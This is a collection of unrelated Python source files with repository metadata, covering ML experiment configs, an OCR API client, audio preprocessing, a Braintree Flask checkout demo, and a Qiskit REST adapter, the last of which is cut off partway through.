ch032_1side_5__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
#############################################################
if(__name__ == "__main__"):
print("build exps cost time:", time.time() - start_time)
if len(sys.argv) < 2:
############################################################################################################
### 直接按 F5 或打 python step10_b1_exp_obj_load_and_train_and_test.py,後面沒有接東西喔!才不會跑到下面給 step10_b_subprocss.py 用的程式碼~~~
ch032_1side_1__2side_1.build().run()
# print('no argument')
sys.exit()
### 以下是給 step10_b_subprocess.py 用的,相當於cmd打 python step10_b1_exp_obj_load_and_train_and_test.py 某個exp.build().run()
eval(sys.argv[1])
| [
"s89334roy@yahoo.com.tw"
] | s89334roy@yahoo.com.tw |
64c64d4b26169cf61deb2becd4b52ca4a334ada7 | d5341a2f0b66ea5e323adf0f64fc67f68b5a21f7 | /pero-api-requests.py | 62120db413b11ad86e2f64eb862c3f00cfce9991 | [] | no_license | hankaluk/pero-api-request-ocr-script | d6b737e7550d384900f649fa2dbde11a3553bbab | 25371136f3264fdc6ce1570d8cfcb20a3fd61bc5 | refs/heads/master | 2023-02-28T07:47:48.491297 | 2021-02-08T16:55:29 | 2021-02-08T16:55:29 | 318,824,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,901 | py | import json
import logging
import os
import time
import requests
SERVER_URL = os.environ.get('SERVER_URL')
API_KEY = os.environ.get('API_KEY')
INPUT_FILE = os.environ.get('INPUT_FILE')
headers = {"api-key": API_KEY, "Content-Type": "application/json"}
# logger
file_handler = logging.FileHandler('main_logs.log')
formatter = logging.Formatter("%(asctime)s:%(name)s:%(levelname)s:%(message)s")
file_handler.setFormatter(formatter)
logger_main = logging.getLogger(__name__)
logger_main.setLevel(logging.DEBUG)
logger_main.addHandler(file_handler)
def main():
format_txt = "txt"
format_alto = "alto"
# loading the json file into a dictionary
file_names = []
try:
with open(INPUT_FILE, "r", encoding="utf-8") as input_file:
try:
data = json.load(input_file)
for key in data.get("images").keys():
file_names.append(key)
except json.JSONDecodeError as err:
logger_main.error(f"Error occurred: {err}")
exit(1)
except KeyError as err:
logger_main.error(f"Error occurred: {err}")
exit(1)
except FileNotFoundError as err:
logger_main.error(f"Error occurred: {err}")
exit(1)
except Exception as err:
logger_main.error(f"Error occurred: {err}")
exit(1)
# create a destination directory
output_dir = create_destination()
# setting timer
logger_main.info("Processing started.")
start = time.time()
# send data for processing and get request id in return
request_id = ""
while not request_id:
request_id = post_processing_request(data)
# time.sleep(10800) # 3 hour wait for the processing of 1500-2000 images in one request
time.sleep(60)
# create session for long processing
session = requests.Session()
# request the status of processing
failed_files = []
unprocessed_files = []
processed = False
while not processed:
processed = request_status(session, request_id)
time.sleep(600)
# download logger
file_handler_result = logging.FileHandler('result_download.log')
file_handler_result.setFormatter(formatter)
result_logger = logging.getLogger("result_logger")
result_logger.setLevel(logging.INFO)
result_logger.addHandler(file_handler_result)
# downloading results
for name in file_names:
result = download_results(session, output_dir, request_id, name, format_txt, result_logger)
if result == "PROCESSED":
download_results(session, output_dir, request_id, name, format_alto, result_logger)
else:
processing = check_status(session, request_id, result)
if processing == 'PROCESSING_FAILED':
failed_files.append(name)
else:
unprocessed_files.append(name)
# downloading unprocessed files
while unprocessed_files:
result_logger.info(unprocessed_files)
time.sleep(1800) # wait for processing the files
for file in unprocessed_files:
result = download_results(session, output_dir, request_id, file, format_txt, result_logger)
if result == "PROCESSED":
download_results(session, output_dir, request_id, file, format_alto, result_logger)
unprocessed_files.remove(file)
if not failed_files:
logger_main.info(f"Processing failed for following files: {failed_files}")
else:
logger_main.info(f"None of the files failed to be processed.")
finish = time.time()
total_time = int(finish-start)
logger_main.info(f"Processing finished, "
f"total processing time: {total_time//3600} h,"
f"{(total_time%3600)//60} m,"
f"{total_time%60} s.")
# create the destination directories
def create_destination():
output_dir = os.path.basename(INPUT_FILE).split(".")[0]
output_main = "results"
output_path_txt = os.path.join(output_main, output_dir, "txt")
output_path_alto = os.path.join(output_main, output_dir, "alto")
if not os.path.isdir(output_path_txt):
os.makedirs(output_path_txt)
logger_main.info(f"{output_path_txt} was successfully created.")
else:
logger_main.info(f"{output_path_txt} already exists.")
if not os.path.isdir(output_path_alto):
os.makedirs(output_path_alto)
logger_main.info(f"{output_path_alto} was successfully created.")
else:
logger_main.info(f"{output_path_alto} already exists.")
return os.path.join(output_main, output_dir)
# sends data for processing
def post_processing_request(data):
url = SERVER_URL + "post_processing_request"
response = requests.post(url, json=data, headers=headers)
# logger_main.info(f"Post processing response: {response}: {response.text}")
response_dict = response.json()
if response.status_code == 200 and response_dict.get('status') == "success":
request_id = response_dict.get('request_id')
logger_main.info(f"Request ID: {request_id}")
return request_id
else:
logger_main.error(f"Processing request ended with code {response.status_code}."
f"{response_dict.get('message')}")
def request_status(session, request_id):
url = SERVER_URL + "request_status/" + request_id
response = session.get(url, headers=headers)
response_dict = response.json()
dict_values = response_dict.get('request_status').values()
for value in dict_values:
if 'PROCESSED' in value.get('state'):
return True
else:
logger_main.info(f"{response.status_code} : {response_dict.get('status')}"
f" : {response_dict.get('message')}")
return False
def download_results(session, output_dir, request_id, file_name, result_format, result_logger):
url = os.path.join(SERVER_URL, "download_results", request_id, file_name, result_format)
file_path = os.path.join(output_dir, result_format, file_name)
response = session.get(url, headers=headers)
if response.status_code == 200:
with open(file_path, "w", encoding="utf-8") as f:
f.write(response.text)
result_logger.info(f"{file_name} is processed.")
return "PROCESSED"
else:
response_dict = response.json()
result_logger.info(f"{file_name} ended with code {response.status_code} : "
f"{response_dict.get('status')} : {response_dict.get('message')}")
return file_name
def check_status(session, request_id, file_name):
url = SERVER_URL + "request_status/" + request_id
response = session.get(url, headers=headers)
file_status = response.json().get('request_status').get(file_name).get('state')
return file_status
main()
| [
"hanka.luk.85@gmail.com"
] | hanka.luk.85@gmail.com |
bb1e5692479370ef21791b709b75e4c5b002a24a | 6e5abad8fd8d089eb8bc5431d226452b5e1c879a | /laughter-c0.py | 6e6a8f0c5dd2f4764c56755a01cd386578395559 | [] | no_license | hirokisince1998/laughter-wavenet | 3f6975ae78aef7277e951129bb7c55fdc1377b9d | 7bb800812cd51d95915766de2230cd37bb503d97 | refs/heads/master | 2023-01-10T18:52:29.517012 | 2020-11-13T10:58:40 | 2020-11-13T10:58:40 | 295,068,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,389 | py | from concurrent.futures import ProcessPoolExecutor
from functools import partial
import numpy as np
import os
import audio
from nnmnkwii.io import hts
from nnmnkwii import preprocessing as P
import merlin as fe # <- modified by hiroki
from nnmnkwii.datasets import FileDataSource
from hparams import hparams
from os.path import exists, join
from glob import glob
available_speakers = [ "04_MSY", "06_FWA" ]
from wavenet_vocoder.util import is_mulaw_quantize, is_mulaw, is_raw
def build_from_path(in_dir, out_dir, num_workers=1, tqdm=lambda x: x):
executor = ProcessPoolExecutor(max_workers=num_workers)
futures = []
speakers = available_speakers
wd = WavFileDataSource(in_dir, speakers=speakers)
mgcd = MgcFileDataSource(in_dir, speakers=speakers)
td = TranscriptionFileDataSource(in_dir, speakers=speakers)
wav_paths = wd.collect_files()
mgc_paths = mgcd.collect_files()
lab_paths = td.collect_files()
speaker_ids = wd.labels
binary_dict, continuous_dict = hts.load_question_set(join(in_dir, "questions", hparams.question_fn))
result = []
for index, (speaker_id, wav_path, mgc_path, lab_path) in enumerate(
zip(speaker_ids, wav_paths, mgc_paths, lab_paths)):
result.append(_process_utterance(out_dir, index + 1, speaker_id, wav_path, mgc_path, lab_path, binary_dict, continuous_dict, "N/A"))
return result
def _process_utterance(out_dir, index, speaker_id, wav_path, mgc_path, lab_path, binary_dict, continuous_dict, text):
# Load the audio to a numpy array. Resampled if needed
wav = audio.load_wav(wav_path)
# determine sessionID and uttID
wavbn = os.path.basename(wav_path)
uttID = os.path.splitext(wavbn)[0]
if hparams.rescaling:
wav = wav / np.abs(wav).max() * hparams.rescaling_max
# Mu-law quantize
if is_mulaw_quantize(hparams.input_type):
# [0, quantize_channels)
out = P.mulaw_quantize(wav, hparams.quantize_channels)
constant_values = P.mulaw_quantize(0, hparams.quantize_channels)
out_dtype = np.int16
elif is_mulaw(hparams.input_type):
# [-1, 1]
out = P.mulaw(wav, hparams.quantize_channels)
constant_values = P.mulaw(0.0, hparams.quantize_channels)
out_dtype = np.float32
else:
# [-1, 1]
out = wav
constant_values = 0.0
out_dtype = np.float32
# time-aligned context
if hparams.frame_shift_ms is None:
frame_shift_in_micro_sec = (hparams.hop_size * 10000000) // hparams.sample_rate
else:
frame_shift_in_micro_sec = hparams.frame_shift_ms * 10000
labels = hts.HTSLabelFile(frame_shift_in_micro_sec)
labels.load(lab_path)
linguistic_features = fe.linguistic_features(labels, binary_dict, continuous_dict, add_frame_features=True, frame_shift_in_micro_sec = frame_shift_in_micro_sec)
Nwav = len(out) // audio.get_hop_size()
out = out[:Nwav * audio.get_hop_size()]
timesteps = len(out)
fp = open(mgc_path)
mgc = np.fromfile(fp, np.float32, -1) - np.log(32768)
fp.close()
N = len(mgc) // hparams.num_mels
mgc = np.reshape(mgc, (N, hparams.num_mels))
c0 = audio._normalize(audio._amp_to_db(np.exp(mgc[0:Nwav,0:1])))
# combine linguistic + c0
context = np.hstack((linguistic_features, c0))
# Write the spectrograms to disk:
audio_filename = 'audio-' + uttID + '.npy'
context_filename = 'context-' + uttID + '.npy'
np.save(os.path.join(out_dir, audio_filename),
out.astype(out_dtype), allow_pickle=False)
np.save(os.path.join(out_dir, context_filename),
context.astype(np.float32), allow_pickle=False)
# Return a tuple describing this training example:
return (audio_filename, context_filename, timesteps, text, speaker_id)
class _LaughterBaseDataSource(FileDataSource):
def __init__(self, data_root, speakers, labelmap, max_files):
self.data_root = data_root
self.speakers = speakers
if labelmap is None:
labelmap = {}
for idx, speaker in enumerate(speakers):
labelmap[speaker] = idx
self.labelmap = labelmap
self.labels = None
self.max_files = max_files
def collect_files(self, filekind):
if filekind == "wav":
root = join(self.data_root, "training", "wav")
ext = ".wav"
elif filekind == "lab":
root = join(self.data_root, "training", "labels", "full-timealign")
ext = ".lab"
elif filekind == "mgc":
root = join(self.data_root, "training", "mgc")
ext = ".mgc"
else:
print("laughter-c0: unknown file kind")
sys.exit(1)
paths = []
labels = []
if self.max_files is None:
max_files_per_speaker = None
else:
max_files_per_speaker = self.max_files // len(self.speakers)
for idx, speaker in enumerate(self.speakers):
files = sorted(glob(join(root, speaker, "{}_*{}".format(speaker, ext))))
files = files[:max_files_per_speaker]
for f in files:
paths.append(f)
labels.append(self.labelmap[self.speakers[idx]])
self.labels = np.array(labels, dtype=np.int16)
return paths
class TranscriptionFileDataSource(_LaughterBaseDataSource):
def __init__(self, data_root, speakers=available_speakers, labelmap=None, max_files=None):
super(TranscriptionFileDataSource, self).__init__(
data_root, speakers, labelmap, max_files)
def collect_files(self):
return super(TranscriptionFileDataSource, self).collect_files("lab")
class WavFileDataSource(_LaughterBaseDataSource):
def __init__(self, data_root, speakers=available_speakers, labelmap=None, max_files=None):
super(WavFileDataSource, self).__init__(
data_root, speakers, labelmap, max_files)
def collect_files(self):
return super(WavFileDataSource, self).collect_files("wav")
class MgcFileDataSource(_LaughterBaseDataSource):
def __init__(self, data_root, speakers=available_speakers, labelmap=None, max_files=None):
super(MgcFileDataSource, self).__init__(
data_root, speakers, labelmap, max_files)
def collect_files(self):
return super(MgcFileDataSource, self).collect_files("mgc")
| [
"hiroki@speech-lab.org"
] | hiroki@speech-lab.org |
7d2fe8aa23cc9cbade79f992a81703bc13bc26c4 | c38f15738026ea2d1a3597be6dcf502d5a6189a6 | /1-python-power/progBChamaProgA.py | 7496026ad70195b3cc00902cc4e0e0b88e4ab74c | [] | no_license | cassiodamacena/wttd | f3e151e0ebaa56c683f2c136476c50de6900fda3 | ee04e141633cfc59cf51db01bad0a233826402c5 | refs/heads/master | 2023-03-24T10:39:22.355830 | 2021-03-17T00:33:27 | 2021-03-17T00:33:27 | 347,541,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | print('Begin', __name__)
import progA # Importando progA e já executa o seu código
print('Define fB')
def fA():
print('Dentro fB')
progA.fA() # Chamando agora somente a função fA de progA
print('Chama fB')
fA()
print('End', __name__)
| [
"cassiodamacena@hotmail.com"
] | cassiodamacena@hotmail.com |
bcb26bf70a2bb0b028dff102692d4db3eef4d03d | 7854a7f95864a42d0becadef3ddf77830e4fbe2c | /app.py | 9d7d0219e799abeb74ec3c9457772539db856ceb | [
"MIT"
] | permissive | alex2060/git_traider | 9cc64f889acba9a06daf02e800b7fd126f0a5da5 | 6dd1df327dbb3dc74479246ebb2355f48bad9d78 | refs/heads/main | 2023-08-14T16:59:52.208972 | 2021-09-15T02:35:38 | 2021-09-15T02:35:38 | 406,588,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,227 | py | from flask import Flask, redirect, url_for, render_template, request, flash
import os
from os.path import join, dirname
from dotenv import load_dotenv
import braintree
from gateway import generate_client_token, transact, find_transaction
load_dotenv()
import requests
#makes and retruns crypto key
def make_qr_code():
path = "http://alexhaussmann.com/adhaussmann/a_final/"
command= "add_key_dev.php?uname=ptest_led&password=pass&email=ReceiverEmail"
x = requests.get(path+command)
val = str(x.content)
out = val.split(" ")
print(out[1]+"-"+out[2])
return out[1]+"-"+out[2]
def convert(mystuff):
out = mystuff.split("-")
return "http://alexhaussmann.com/adhaussmann/a_final/output2.php?key="+out[1]+"&name="+out[0]+"&entery_name=ptest_led"
#myval = make_qr_code()
app = Flask(__name__)
app.secret_key = os.environ.get('APP_SECRET_KEY')
PORT = int(os.environ.get('PORT', 4567))
TRANSACTION_SUCCESS_STATUSES = [
braintree.Transaction.Status.Authorized,
braintree.Transaction.Status.Authorizing,
braintree.Transaction.Status.Settled,
braintree.Transaction.Status.SettlementConfirmed,
braintree.Transaction.Status.SettlementPending,
braintree.Transaction.Status.Settling,
braintree.Transaction.Status.SubmittedForSettlement
]
@app.route('/', methods=['GET'])
def index():
return redirect(url_for('new_checkout'))
@app.route('/checkouts/new', methods=['GET'])
def new_checkout():
client_token = generate_client_token()
return render_template('checkouts/new.html', client_token=client_token)
@app.route('/checkouts/<transaction_id>', methods=['GET'])
def show_checkout(transaction_id):
out = transaction_id.split("_")
transaction = find_transaction(out[0])
result = {}
if transaction.status in TRANSACTION_SUCCESS_STATUSES:
result = {
'header': 'Sweet Success!',
'icon': 'success',
'message': 'Your test transaction has been successfully processed. See the Braintree API response and try again.',
'link' : convert(out[1])
}
else:
result = {
'header': 'Transaction Failed',
'icon': 'fail',
'message': 'Your test transaction has a status of ' + transaction.status + '. See the Braintree API response and try again.',
'link' : ""
}
return render_template('checkouts/show.html', transaction=transaction, result=result)
@app.route('/checkouts', methods=['POST'])
def create_checkout():
result = transact({
'amount': request.form['amount'],
'payment_method_nonce': request.form['payment_method_nonce'],
'options': {
"submit_for_settlement": True
}
})
if result.is_success:
val = make_qr_code()
if result.is_success or result.transaction:
print("in here")
print(request.form['amount'])
return redirect(url_for('show_checkout',transaction_id=result.transaction.id+"_"+val ))
else:
for x in result.errors.deep_errors: flash('Error: %s: %s' % (x.code, x.message))
return redirect(url_for('new_checkout'))
if __name__ == '__main__':
app.run(host='0.0.0.0', port=PORT, debug=True)
| [
"alex.haussmann@gmail.com"
] | alex.haussmann@gmail.com |
38989ea3cc2d9323d7df74726b4cbe4770c237d1 | 1d0895269d1d93bab6a0b595c806418b1eeda735 | /qiskit/providers/ibmq/api/rest/experiment.py | 21cea49b8c27b3ce319c61a25cd6e4314e06b812 | [
"Apache-2.0"
] | permissive | Qiskit/qiskit-ibmq-provider | 3921bf5f77a9621013ada7ea5e18fa199470650c | 590f68d9ddb42a45c4ac8a8626ea60da85575b21 | refs/heads/master | 2023-06-08T03:17:52.745052 | 2023-06-05T14:20:16 | 2023-06-05T14:20:16 | 163,192,893 | 240 | 182 | Apache-2.0 | 2023-06-05T14:20:18 | 2018-12-26T15:22:11 | Python | UTF-8 | Python | false | false | 5,218 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Experiment REST adapter."""
import logging
from typing import Dict, Union
from .base import RestAdapterBase
from ..session import RetrySession
logger = logging.getLogger(__name__)
class Experiment(RestAdapterBase):
"""Rest adapter for experiment related endpoints."""
URL_MAP = {
'self': '',
'upload_plots': '/plots'
}
def __init__(self, session: RetrySession, experiment_uuid: str, url_prefix: str = '') -> None:
"""Experiment constructor.
Args:
session: Session to be used in the adaptor.
experiment_uuid: UUID of the experiment.
url_prefix: URL prefix.
"""
super().__init__(session, '{}/experiments/{}'.format(url_prefix, experiment_uuid))
def retrieve(self) -> str:
"""Retrieve the specific experiment.
Returns:
Experiment data.
"""
url = self.get_url('self')
return self.session.get(url).text
def update(self, experiment: str) -> Dict:
"""Update the experiment.
Args:
experiment: Experiment to update.
Returns:
JSON response.
"""
url = self.get_url('self')
return self.session.put(url, data=experiment, headers=self._HEADER_JSON_CONTENT).json()
def delete(self) -> Dict:
"""Delete the experiment.
Returns:
JSON response.
"""
url = self.get_url('self')
return self.session.delete(url).json()
def upload_plot(
self,
plot: Union[bytes, str],
plot_name: str,
sync_upload: bool = True
) -> Dict:
"""Upload a plot for the experiment.
Args:
plot: Plot file name or data to upload.
plot_name: Name of the plot.
sync_upload: By default the server will upload the plot file
to backend storage asynchronously. Set this to False to use
that behavior and not block the upload.
Returns:
JSON response.
"""
url = self.get_url('upload_plots')
headers = {
'x-sync-upload': str(sync_upload)
}
if isinstance(plot, str):
with open(plot, 'rb') as file:
data = {'plot': (plot_name, file)}
response = self.session.post(url, files=data, headers=headers).json()
else:
data = {'plot': (plot_name, plot)} # type: ignore[dict-item]
response = self.session.post(url, files=data, headers=headers).json()
return response
class ExperimentPlot(RestAdapterBase):
"""Rest adapter for experiment plot related endpoints."""
URL_MAP = {
'self': ''
}
def __init__(
self,
session: RetrySession,
experiment_uuid: str,
plot_name: str,
url_prefix: str = '') -> None:
"""Experiment constructor.
Args:
session: Session to be used in the adaptor.
experiment_uuid: UUID of the experiment.
plot_name: Name of the plot.
url_prefix: URL prefix.
"""
super().__init__(session, '{}/experiments/{}/plots/{}'.format(
url_prefix, experiment_uuid, plot_name))
self.plot_name = plot_name
def retrieve(self) -> bytes:
"""Retrieve the specific experiment plot.
Returns:
Plot content.
"""
url = self.get_url('self')
response = self.session.get(url)
return response.content
def delete(self) -> None:
"""Delete this experiment plot."""
url = self.get_url('self')
self.session.delete(url)
def update(
self,
plot: Union[bytes, str],
sync_upload: bool = True
) -> Dict:
"""Update an experiment plot.
Args:
plot: Plot file name or data to upload.
sync_upload: By default the server will upload the plot file
to backend storage asynchronously. Set this to False to use
that behavior and not block the upload.
Returns:
JSON response.
"""
url = self.get_url('self')
headers = {
'x-sync-upload': str(sync_upload)
}
if isinstance(plot, str):
with open(plot, 'rb') as file:
